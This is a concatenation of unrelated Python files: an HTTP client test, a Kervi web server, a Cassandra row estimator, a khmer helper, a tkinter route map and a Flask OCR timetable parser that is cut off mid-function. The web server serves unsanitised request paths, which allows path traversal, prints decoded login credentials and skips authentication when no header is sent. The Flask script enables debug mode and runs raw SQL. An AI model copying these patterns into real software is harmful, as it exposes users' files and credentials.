except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
webserver.py
|
#MIT License
#Copyright (c) 2017 Tim Wentzlau
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
""" Simple web server for the Kervi application """
import os
import time
import base64
import json
from socketserver import ThreadingMixIn
import http.client
from kervi.spine import Spine
from kervi.core.authentication import Authorization
import kervi.utility.encryption as encryption
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
except:
from http.server import SimpleHTTPRequestHandler
try:
from BaseHTTPServer import HTTPServer
except:
from http.server import HTTPServer
import socket
import threading
import kervi.ui
import os
class _HTTPRequestHandler(SimpleHTTPRequestHandler):
def __init__(self, req, client_addr, server):
try:
SimpleHTTPRequestHandler.__init__(self, req, client_addr, server)
self.server = server
self.req = req
except socket.error:
pass
def log_message(self, format, *args):
return
def do_AUTHHEAD(self):
print("send header")
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
try:
if self.server.do_authorize() and self.headers['Authorization'] == None:
self.do_AUTHHEAD()
#self.wfile.write('no auth header received')
pass
elif self.server.authorize(self.headers['Authorization']):
if self.path.startswith("/cam"):
path = self.path.split("/")
cam_id = path[-1]
spine = Spine()
print("cam:", cam_id)
info = spine.send_query("getComponentInfo", cam_id)
if info:
conn = http.client.HTTPConnection(info["ui"]["source"]["server"], timeout=self.timeout)
conn.request("GET", info["ui"]["source"]["path"])
res = conn.getresponse()
self.send_response(res.status)
for line in res.headers:
self.send_header(line, res.headers[line])
self.end_headers()
while not self.server.terminate:
chunk = res.read(8192)
if not chunk:
break
self.wfile.write(chunk)
elif self.path.endswith("global.js"):
self.send_response(200)
self.send_header('Content-type', 'text/javascript')
self.end_headers()
if encryption.enabled():
response = bytes("kerviSocketAddress='" + str(self.server.ip_address) + ":" + str(self.server.ws_port) + "';\n\rsocketProtocol='wss';", 'utf-8')
else:
response = bytes("kerviSocketAddress='" + str(self.server.ip_address) + ":" + str(self.server.ws_port) + "';\n\rsocketProtocol='ws';", 'utf-8')
self.wfile.write(response)
elif self.path.endswith("kervitexts.js"):
self.send_response(200)
self.send_header('Content-type', 'text/javascript')
self.end_headers()
texts = json.dumps(self.server.texts)
response = bytes("kerviUITexts=" + texts , 'utf-8')
self.wfile.write(response)
else:
if self.path.startswith("/dashboard/") or self.path.startswith("/connect"):
path = self.server.docpath
else:
path = self.server.docpath + self.path
if os.path.exists(path) and os.path.isdir(path):
index_files = ['/index.html', '/index.htm', ]
for index_file in index_files:
tmppath = path + index_file
if os.path.exists(tmppath):
path = tmppath
break
_, ext = os.path.splitext(path)
ext = ext.lower()
content_type = {
'.css': 'text/css',
'.gif': 'image/gif',
'.htm': 'text/html',
'.html': 'text/html',
'.jpeg': 'image/jpeg',
'.jpg': 'image/jpg',
'.js': 'text/javascript',
'.png': 'image/png',
'.text': 'text/plain',
'.txt': 'text/plain',
}
if ext in content_type:
self.send_response(200) # OK
self.send_header('Content-type', content_type[ext])
self.end_headers()
with open(path, 'rb') as ifp:
self.wfile.write(ifp.read())
else:
self.send_response(200) # OK
self.send_header('Content-type', 'text/plain')
self.end_headers()
with open(path, 'rb') as ifp:
self.wfile.write(ifp.read())
else:
self.do_AUTHHEAD()
except IOError:
self.send_error(404, 'file not found')
def relay_streaming(self, res):
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
for line in res.headers.headers:
self.wfile.write(line)
self.end_headers()
try:
while not self.server.terminate:
chunk = res.read(8192)
if not chunk:
break
self.wfile.write(chunk)
self.wfile.flush()
except socket.error:
# connection closed by client
pass
class _HTTPServer(ThreadingMixIn, HTTPServer):
def __init__(self, address, web_port, ws_port, handler):
HTTPServer.__init__(self, (address, web_port), handler)
self.ip_address = address
self.terminate = False
self.ws_port = ws_port
kervipath = os.path.dirname(kervi.ui.__file__)
self.docpath = os.path.join(kervipath, "web/dist")
def do_authorize(self):
return False
def authorize(self, authorize_header):
if authorize_header is None and not self.do_authorize():
return True
else:
authstr = base64.b64decode(authorize_header[6:]).decode('utf-8')
print(authstr)
credentials = authstr.split(":")
print(credentials)
return Authorization.authorize(credentials[0], credentials[1])
SERVER = None
ASSET_PATH = ""
SERVER_THREAD = None
def start(ip_address, http_port, ws_port):
global SERVER, SERVER_THREAD
SERVER = _HTTPServer(ip_address, http_port, ws_port, _HTTPRequestHandler)
if encryption.enabled():
cert_file, key_file = encryption.get_cert()
if key_file and cert_file:
import ssl
SERVER.socket = ssl.wrap_socket (SERVER.socket, keyfile=key_file, certfile=cert_file, server_side=True)
SERVER_THREAD = threading.Thread(target=SERVER.serve_forever, name="webserver")
SERVER_THREAD.daemon = True
SERVER_THREAD.start()
def stop():
#print("stop web server")
SERVER.terminate = True
SERVER.shutdown()
if not SERVER_THREAD.join(5):
print("")
#print("ws terminated")
|
__main__.py
|
#Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#Licensed under the Apache License, Version 2.0 (the "License").
#You may not use this file except in compliance with the License.
#You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from importlib import resources # Python 3.7+
import sys
import logging
import argparse
from threading import Thread, Event
from row_estimator_for_apache_cassandra.estimator import Estimator
def main():
def add_helper(n):
return columns_in_bytes+n
logging.getLogger('cassandra').setLevel(logging.ERROR)
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)
# Event object used to send signals from one thread to another
stop_event = Event()
# Configure app args
parser = argparse.ArgumentParser(description='The tool helps to gather Cassandra rows stats')
requiredNamed = parser.add_argument_group('required named arguments')
requiredNamed.add_argument('--hostname', help='Cassandra endpoint', default='127.0.0.1', required=True)
requiredNamed.add_argument('--port', help='Cassandra native transport port', required=True)
parser.add_argument('--ssl', help='Use SSL.', default=None)
parser.add_argument('--path-cert', help='Path to the TLS certificate', default=None)
parser.add_argument('--username', help='Authenticate as user')
parser.add_argument('--password',help='Authenticate using password')
requiredNamed.add_argument('--keyspace',help='Gather stats against provided keyspace', required=True)
requiredNamed.add_argument('--table',help='Gather stats against provided table', required=True)
parser.add_argument('--execution-timeout', help='Set execution timeout in seconds', type=int, default=360)
parser.add_argument('--token-step', help='Set token step, for example, 2, 4, 8, 16, 32, ..., 255',type=int, default=4)
parser.add_argument('--rows-per-request', help='How many rows per token',type=int, default=1000)
parser.add_argument('--pagination', help='Turn on pagination mechanism',type=int, default=200)
parser.add_argument('--dc', help='Define Cassandra datacenter for routing policy', default='datacenter1')
parser.add_argument('--json', help='Estimata size of Cassandra rows as JSON', default=None)
if (len(sys.argv)<2):
parser.print_help()
sys.exit()
args = parser.parse_args()
p_hostname = args.hostname
p_port = args.port
p_username = args.username
p_password = args.password
p_ssl = args.ssl
p_path_cert = args.path_cert
p_json = args.json
p_dc = args.dc
p_keyspace = args.keyspace
p_table = args.table
p_execution_timeout = args.execution_timeout
p_token_step = args.token_step
p_rows_per_request = args.rows_per_request
p_pagination = args.pagination
estimator = Estimator(p_hostname, p_port, p_username, p_password, p_ssl, p_dc, p_keyspace, p_table,
p_execution_timeout, p_token_step, p_rows_per_request, p_pagination, p_path_cert)
logging.info("Endpoint: %s %s", p_hostname, p_port)
logging.info("Keyspace name: %s", estimator.keyspace)
logging.info("Table name: %s", estimator.table)
logging.info("Client SSL: %s", estimator.ssl)
logging.info("Token step: %s", estimator.token_step)
logging.info("Limit of rows per token step: %s", estimator.rows_per_request)
logging.info("Pagination: %s", estimator.pagination)
logging.info("Execution-timeout: %s", estimator.execution_timeout)
if p_json == None:
action_thread = Thread(target=estimator.row_sampler(json=False))
action_thread.start()
action_thread.join(timeout=estimator.execution_timeout)
stop_event.set()
columns_in_bytes = estimator.get_total_column_size()
rows_in_bytes = estimator.rows_in_bytes
rows_columns_in_bytes = map(add_helper, rows_in_bytes)
val = list(rows_columns_in_bytes)
logging.info("Number of sampled rows: %s", len(rows_in_bytes))
logging.info("Estimated size of column names and values in a row:")
logging.info(" Mean: %s", '{:06.2f}'.format(estimator.mean(val)))
logging.info(" Weighted_mean: %s", '{:06.2f}'.format(estimator.weighted_mean(val)))
logging.info(" Median: %s", '{:06.2f}'.format(estimator.median(val)))
logging.info(" Min: %s",min(val))
logging.info(" P10: %s",'{:06.2f}'.format(estimator.quartiles(val, 0.1)))
logging.info(" P50: %s",'{:06.2f}'.format(estimator.quartiles(val, 0.5)))
logging.info(" P90: %s",'{:06.2f}'.format(estimator.quartiles(val, 0.9)))
logging.info(" Max: %s",max(val))
logging.info(" Average: %s",'{:06.2f}'.format(sum(val)/len(val)))
logging.info("Estimated size of values in a row")
logging.info(" Mean: %s", '{:06.2f}'.format(estimator.mean(rows_in_bytes)))
logging.info(" Weighted_mean: %s", '{:06.2f}'.format(estimator.weighted_mean(rows_in_bytes)))
logging.info(" Median: %s", '{:06.2f}'.format(estimator.median(rows_in_bytes)))
logging.info(" Min: %s",min(rows_in_bytes))
logging.info(" P10: %s",'{:06.2f}'.format(estimator.quartiles(rows_in_bytes, 0.1)))
logging.info(" P50: %s",'{:06.2f}'.format(estimator.quartiles(rows_in_bytes, 0.5)))
logging.info(" P90: %s",'{:06.2f}'.format(estimator.quartiles(rows_in_bytes, 0.9)))
logging.info(" Max: %s",max(rows_in_bytes))
logging.info(" Average: %s",'{:06.2f}'.format(sum(rows_in_bytes)/len(rows_in_bytes)))
logging.info("Total column name size in a row: %s",columns_in_bytes)
logging.info("Columns in a row: %s", estimator.get_columns().count(',')+1)
else:
action_thread = Thread(target=estimator.row_sampler(json=True))
action_thread.start()
action_thread.join(timeout=estimator.execution_timeout)
stop_event.set()
rows_in_bytes = estimator.rows_in_bytes
logging.info("Number of sampled rows: %s", len(rows_in_bytes))
logging.info("Estimated size of a Cassandra JSON row")
logging.info("Mean: %s", '{:06.2f}'.format(estimator.mean(rows_in_bytes)))
logging.info("Weighted_mean: %s", '{:06.2f}'.format(estimator.weighted_mean(rows_in_bytes)))
logging.info("Median: %s", '{:06.2f}'.format(estimator.median(rows_in_bytes)))
logging.info("Min: %s",min(rows_in_bytes))
logging.info("Max: %s",max(rows_in_bytes))
logging.info("Average: %s",'{:06.2f}'.format(sum(rows_in_bytes)/len(rows_in_bytes)))
if __name__ == "__main__":
main()
|
functions.py
|
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2015, Michigan State University.
# Copyright (C) 2015, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
"""A collection of functions for use throughout khmer/oxli."""
from __future__ import print_function
import threading
import khmer.utils
def build_graph(ifilenames, graph, num_threads=1, tags=False):
"""
Construct a counting graph from a set of input files.
- ifilenames: list of input files
- graph: existing graph
- num_threads: number of threads (optional)
- tags: should there be tags
"""
if tags:
eat = graph.consume_fasta_and_tag_with_reads_parser
else:
eat = graph.consume_fasta_with_reads_parser
for _, ifile in enumerate(ifilenames):
rparser = khmer.ReadParser(ifile)
threads = []
for _ in range(num_threads):
cur_thread = threading.Thread(target=eat, args=(rparser,))
threads.append(cur_thread)
cur_thread.start()
for thread in threads:
thread.join()
|
mapFrame.py
|
"""
Frame principale avec l'image de la carte, où sera ajouté le chemin à parcourir
"""
from random import randrange # création couleurs aléatoires
from tkinter import * # GUI
from tkinter import ttk # better/other widgets
from PIL import ImageTk, Image, ImageDraw, ImageFont # image handling
from time import sleep # used in threads to wait
from threading import Thread # multithreading (auto resizing and delayed destroying of widgets)
from prim_lib import PRIM # class to interact with the prim algorithm
PATH_TO_MAP = 'assets/map.png'
PATH_TO_BTN = 'assets/search.png'
POS_VILLES = ( # format (x, y), same order as villes list
(602, 638), (340, 730),(270, 875),(481, 864),(765, 894),(905, 850),(260, 484),(259, 390),(548, 305),
(595, 95),(737, 473),(730, 719),(549, 725),(514, 416),(667, 255),(935, 334),(470, 627),
(670, 363),(385, 235),(258, 213),(49, 355),(342, 579)
)
class MapFrame(Frame):
def __init__(self, master) -> None:
super().__init__(master)
self.master = master
self.choice = None
self.path_showed = False
self.prim = PRIM()
"""Interface with the prim library"""
self.__path_colors = {0:"#000000"}
"""List of the colors for path rendering (path 0 is black)"""
self.__selection_widgets = {}
"""Dictionary which contains the widgets for the names, and eventually a thread to destroy them (after losing focus)\n
Format is : dict[cityIndex: int, list[Widget, () || Thread]]"""
# =======================================
# IMAGES
# map image
self.mapImg = Image.open(PATH_TO_MAP)
"""Pillow object for map image (can be resized)"""
self.mapImgTk = ImageTk.PhotoImage(self.mapImg)
"""Tkinter object for map image (cannot be resized)"""
# search icon for button
img_btn = Image.open(PATH_TO_BTN)
self.btnImg = ImageTk.PhotoImage(img_btn)
# =======================================
self.__create_widgets()
self.pack()
def __create_widgets(self):
def scale_changed():
if self.path_showed:
self.__reset_image()
self.show_path()
self.mapLabel = Label(self, text='map', image=self.mapImgTk)
self.mapLabel.pack()
self.primBtn = ttk.Button(self, text='Search path...', command=self.show_path,
image=self.btnImg, state=DISABLED)
self.primBtn.place(relx=.05, rely=.6)
self.scale_voyageur = ttk.Spinbox(self, width=5, background=self["background"],
from_=1, to=len(POS_VILLES), increment=1.0, font=20, command=scale_changed)
self.scale_voyageur.set(1)
self.scale_voyageur.place(relx=.05, rely=.75)
def __reset_image(self):
self.mapImg = Image.open(PATH_TO_MAP)
win_size = self.master.size
img = self.mapImg.resize(tuple(win_size))
self.mapImgTk = ImageTk.PhotoImage(img)
self.mapLabel['image'] = self.mapImgTk
self.path_showed = False
def show_selection(self, x: int, y: int):
"""Func called by a Motion event sent by Tk window.\n
Renders the widgets for cities close to the mouse cursor, that can be clicked to chose it as the starting city"""
def on_click(event):
name = event.widget['text'].split('\n')[0]
index_ville = self.master.villes.index(name)
if self.choice == index_ville:
self.choice = None
event.widget['text'] = name
event.widget['background'] = '#A8B8FF'
self.primBtn['state'] = DISABLED
else:
self.choice = index_ville
event.widget['text'] += '\n(départ)'
event.widget['background'] = '#FF5858'
self.primBtn['state'] = NORMAL
# reset the map image
self.__reset_image()
event.widget.update()
width, height = self.master.size
x_factor = 1000 / width
y_factor = 1000 / height
for (xv, yv), i in zip(POS_VILLES, range(len(POS_VILLES))):
name = self.master.villes[i]
if abs(xv / x_factor - x) < 50 / x_factor and abs(yv / y_factor - y) < 50 / x_factor: # close to the city
if not i in self.__selection_widgets.keys():
w = Label(self, text=name, background='#A8B8FF', font=('Arial', int(10 + 6 / x_factor)), name=name)
w.bind('<1>', on_click)
w.place(x=xv / x_factor - 5 * len(name), y=yv / y_factor)
self.__selection_widgets[i] = [w, ()]
else:
if i in self.__selection_widgets.keys():
if not self.__selection_widgets[i][1]: # there is no active remove thread for this widget
remove_thread = Thread(target=self.__remove_name_widget, args=(i,))
remove_thread.setDaemon(True) # to prevent error when closing main program
remove_thread.start()
self.__selection_widgets[i][1] = remove_thread
def __remove_name_widget(self, i):
"""Thread created when a widget *looses focus* (isn't close to mouse cursor)\n
Destroy it if it isn't the start choice, after .5 seconds"""
sleep(.5)
name = self.__selection_widgets[i][0]['text'].split('\n')[0]
index_ville = self.master.villes.index(name)
while self.choice == index_ville:
sleep(.5)
self.__selection_widgets[i][0].destroy()
self.__selection_widgets.pop(i)
def resize_map(self):
"""Used in an external thread, each .1 seconds, checks if the window size changed.\n
If yes, resize the map to fit in the new size"""
pred_size = []
while 1:
img = Image.open(PATH_TO_MAP)
# get the MapFrame size
self.master.size = () # update the size
win_size = list(self.master.size)
if win_size != pred_size: # size changed
# resize the image in the available space
img = self.mapImg.resize(tuple(win_size))
# reset the image to update the map label
self.mapImgTk = ImageTk.PhotoImage(img)
self.mapLabel['image'] = self.mapImgTk
pred_size = [*win_size]
sleep(.1)
def show_path(self):
"""Func called by the search button or when the scale is activated and a path is already shown.\n
Renders the path(s) of each traveler(s), with colored line between cities and numeric order"""
# execute the algorithm to find the path
self.prim.execute(self.choice, int(self.scale_voyageur.get()))
#self.prim.execute(self.choice, int(self.scale_voyageur.get()), True) # """upgraded""" algorithm
self.prim.upgrade()
paths = self.prim.npaths
print("max len path :", self.prim.len_max)
# add the order to the cities
draw = ImageDraw.Draw(self.mapImg) # drawing object
# add the lines between each city and the order numbers
for i, path in paths.items():
if i in self.__path_colors.keys():
color = self.__path_colors[i]
else:
color = '#{}{}{}'.format(*[
hex(randrange(0, 200))[2:].zfill(2)
for _ in range(3)])
self.__path_colors[i] = color
for D, A in zip(path, path[1:]):
draw.line((POS_VILLES[D], POS_VILLES[A]), color, 5)
for n, j in zip(path[:-1], range(len(path))):
fnt = ImageFont.truetype("assets/arial.ttf", 30)
draw.rectangle((POS_VILLES[n], tuple([pos + 30 for pos in POS_VILLES[n]])), fill='white')
draw.text(POS_VILLES[n], f'{j}', fill=color, font=fnt)
# update the map image
win_size = self.master.size
img = self.mapImg.resize(tuple(win_size))
self.mapImgTk = ImageTk.PhotoImage(img)
self.mapLabel['image'] = self.mapImgTk
self.primBtn['state'] = DISABLED
self.path_showed = True
|
flesk_api.py
|
import cv2, numpy, requests, time, pytesseract, flask, os, json, threading, pymysql.cursors
from datetime import datetime
from collections import Counter
from pdf2image import convert_from_bytes
from flask import request, jsonify
app = flask.Flask(__name__)
app.config["DEBUG"] = True
#####Параметры MySQL######
HOST = "HOST" #
USER = "USER" #
PASSWORD = "PASSWORD" #
DB = "DB" #
##########################
#Функция для взаимодействия со всеми элементами БД
def MySQLFetchAll(SQLString):
connection = pymysql.connect(host=HOST,user=USER,password=PASSWORD,db=DB,cursorclass=pymysql.cursors.DictCursor,charset="utf8")
try:
with connection.cursor() as cursor:
cursor.execute(SQLString)
result = cursor.fetchall()
finally:
connection.close()
return result
def ParseKIPTT(pdfid):
leftnumber_cell_list = []
group_cell_list = []
circle_store_list = []
box_store_list = []
finalmatrix = []
group_text_association = {}
center_and_text = {}
#Функция для записи в БД
def MySQLWriter(insertjson):
cnx = pymysql.connect(host=HOST,user=USER,password=PASSWORD,db=DB,cursorclass=pymysql.cursors.DictCursor,charset="utf8")
cur = cnx.cursor()
insert = "UPDATE Outtable SET localvalue = %s WHERE shortname=\"outjson\";"
try:
cur.execute(insert, (json.dumps(insertjson,ensure_ascii=False),))
cnx.commit()
finally:
cnx.close()
def get_document():
url = "http://46.101.17.171/PDF/"+pdfid+".pdf"
r = requests.get(url, stream=True)
with open('PDF.pdf', 'wb') as fd:
for chunk in r.iter_content(2000):
fd.write(chunk)
pages = convert_from_bytes(open('PDF.pdf', 'rb').read(),300)
for page in pages:
page.save('PNG.png', 'PNG')
#Процедура для того, чтоб контур не был огромным
def check_res(firstflag, old, new):
if firstflag == True:
return True
else:
return new[1][0]<(old[1][0]+(old[1][0]/100)*80) and new[1][1]<(old[1][1]+(old[1][1]/100)*80)
#Процедура визаулизации матрицы
def matrix(rows,columns):
matrix = []
counter = 0
circle_store_list.sort(key=lambda x: (x[1]),reverse=True)
for i in range(columns):
matrix.append([])
for j in range(rows):
matrix[i].append(circle_store_list[counter])
counter +=1
for item in matrix:
item.sort(key=lambda x: (x[0]))
i = len(matrix)-1
while i != -1:
finalmatrix.append(matrix[i])
i -=1
#Функция для определения всех погрешностей кругов
def allcenters_checker(center):
for item in circle_store_list:
if ((item[0] == center[0]) and (abs(item[1]-center[1])<8)) or ((item[1] == center[1]) and (abs(item[0]-center[0])<8)):
return False
return True
#Функция для проверки на то, чтоб контур не включал в себя номера пар
def leftnumberchecker(box):
for item in leftnumber_cell_list:
for boxitem in box:
for p in range(0,len(item)-2):
if (item[p][0],item[p][1]) == (boxitem[0], boxitem[1]):
return False
return True
#Функция для проверки на то, чтоб контур не включал в себя названия групп
def titlechecker(box):
for item in group_cell_list:
for boxitem in box:
for p in range(1,len(item)-1):
if (item[p][0],item[p][1]) == (boxitem[0], boxitem[1]):
return False
return True
#Функция для погрешности центров кругов
def centers_checker(a,b):
boolflag0 = False
boolflag1 = False
if (abs(a[0]-b[0]) < 10):
boolflag0 = True
if (abs(a[1]-b[1]) < 10):
boolflag1 = True
if boolflag1 == True and boolflag0 == True:
return True
return False
#Определение null-пар
def get_null_values(timg,image):
outchecklist = []
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (145, 145)) #МИНИМАЛЬНО, ЧТОБ ПРОХОДИЛО БОЛЬШЕ - 180
closed = cv2.morphologyEx(timg, cv2.MORPH_CLOSE, kernel)
cnts = cv2.findContours(closed.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[1]
firstflag = True
old_center = (0, 0)
old_rect = ((0.0, 0.0), (0.0, 0.0), -0.0)
for c in cnts:
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = numpy.int0(box)
center = (int(rect[0][0]),int(rect[0][1]))
if (check_res(firstflag,old_rect,rect) == True) and (AreaChecker(rect) == True) and (centers_checker(center,old_center) == False) and (titlechecker(box) == True):
for item in box_store_list:
locale_counter = 0
for p in item:
for insidep in box:
if (abs(insidep[0]-p[0])<10) and (abs(insidep[1]-p[1])<10):
locale_counter +=1
if locale_counter == 4:
firstflag = False
outchecklist.append(center)
old_rect = rect
old_center = center
cv2.drawContours(image,[box],0,(0,0,255),5)
cv2.circle(image, center, 5, (0,0,255), 5)
for nullitem in outchecklist:
for item in finalmatrix:
for i in range(len(item)):
if (abs(nullitem[0]-item[i][0])<10) and (abs(nullitem[1]-item[i][1])<10):
item.remove(item[i])
item.insert(i,(0,0))
for item in finalmatrix:
for i in range(len(item)):
if item[i] == (0,0):
item.remove(item[i])
item.insert(i,"-")
else:
bufitem = item[i]
item.remove(bufitem)
item.insert(i,center_and_text[bufitem])
def finalmatrix_to_json(groupcheck):
allgroups = []
outjson = {}
for item in groupcheck:
allgroups.append(item[1])
for i in range(len(finalmatrix[0])):
outjson[allgroups[i]] = []
for j in range(len(finalmatrix)):
outjson[allgroups[i]].append(finalmatrix[j][i])
return outjson
#Фильтрация периметра
def AreaChecker(res):
area = int(res[1][0]*res[1][1])
if (area > 20000) and (area < 500000) and (res[1][0] > 130) and (res[1][1] > 130):
return True
return False
def cropimager(image, box):
TopLeftCoords = (box[0][0], box[0][1])
BottomRightCoords = TopLeftCoords
for p in box:
if p[0]<=TopLeftCoords[0] and p[1]<=TopLeftCoords[1]:
TopLeftCoords = (p[0],p[1])
if p[0]>=BottomRightCoords[0] and p[1]>=BottomRightCoords[1]:
BottomRightCoords = (p[0],p[1])
return image[TopLeftCoords[1]+1:BottomRightCoords[1],TopLeftCoords[0]+1:BottomRightCoords[0]]
def grouptextchecker(text):
formatedtext = "".join(text.split())
while formatedtext[-1:].isnumeric() == False:
formatedtext = formatedtext[:-1]
formatedtext = formatedtext[::-1]
while formatedtext[-1:].isnumeric() == False:
formatedtext = formatedtext[:-1]
return formatedtext[::-1]
def main():
get_document()
RowCheckerList=[]
ColumnCheckerList=[]
firstflag = True
image = cv2.imread("PNG.png")
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (3, 3), 0)
edged = cv2.Canny(gray, 10, 250)
cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[1]
old_center = (0, 0)
for c in cnts:
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = numpy.int0(box)
center = (int(rect[0][0]),int(rect[0][1]))
#Цифры пар (слева)
if (rect[1][0] < 200) and (rect[1][0] > 34) and (rect[1][1] < 600) and (rect[1][0] < rect[1][1]) and (rect[0][0] < rect[0][1]):
for p in box:
cv2.circle(image, (p[0],p[1]), 5, (255,0,255), 5)
cv2.drawContours(image,[box],0,(255,0,255),5)
cv2.circle(image, center, 5, (255,0,255), 5)
leftnumber_cell_list.append(box)
#Заголовки групп
elif (rect[1][1] < 100) and (rect[1][1] > 20) and (rect[1][0] > 120) and (rect[1][0] > rect[1][1]) and (rect[0][0] > rect[0][1]) and (centers_checker(center,old_center) == False) and (rect[1][0] < 500):
crop_img = cropimager(image, box)
text = pytesseract.image_to_string(crop_img, lang='rus')
group_text_association[center] = grouptextchecker(text)
old_center = center
for p in box:
cv2.circle(image, (p[0],p[1]), 5, (0,255,0), 5)
cv2.drawContours(image,[box],0,(0,255,0),5)
cv2.circle(image, center, 5, (0,255,0), 5)
group_cell_list.append(box)
#Едем по контурам
sorted_by_value = sorted(group_text_association.items(), key=lambda kv: kv[0])
global_counter = 0
old_center = (0, 0)
old_rect = ((0.0, 0.0), (0.0, 0.0), -0.0)
for c in cnts:
rect = cv2.minAreaRect(c)
box = cv2.boxPoints(rect)
box = numpy.int0(box)
center = (int(rect[0][0]),int(rect[0][1]))
if (check_res(firstflag,old_rect,rect) == True) and (AreaChecker(rect) == True) and (centers_checker(center,old_center) == False) and (allcenters_checker(center) == True) and (titlechecker(box) == True) and (leftnumberchecker(box) == True):
firstflag = False
circle_store_list.append(center)
box_store_list.append(box)
old_rect = rect
old_center = center
cv2.drawContours(image,[box],0,(128,0,0),5)
crop_img = cropimager(image, box)
text = pytesseract.image_to_string(crop_img, lang='rus')
center_and_text[center] = text.replace("\n"," ").replace(" "," ").replace("\n\n"," ")
#Закидываем центры на проверку для подсчета кол-ва повторений
ColumnCheckerList.append(center[0])
RowCheckerList.append(center[1])
global_counter +=1
#Считаем кол-во повторений
RowCounter = Counter(RowCheckerList)
ColumnCounter = Counter(ColumnCheckerList)
#Ищем максимальные элементы в структурированных объектах
MaxRow = 0
MaxColumn = 0
for item in list(RowCounter):
if (RowCounter[item]>MaxRow):
MaxRow=RowCounter[item]
for item in list(ColumnCounter):
if (ColumnCounter[item]>MaxColumn):
MaxColumn=ColumnCounter[item]
if not os.path.exists("outputs"):
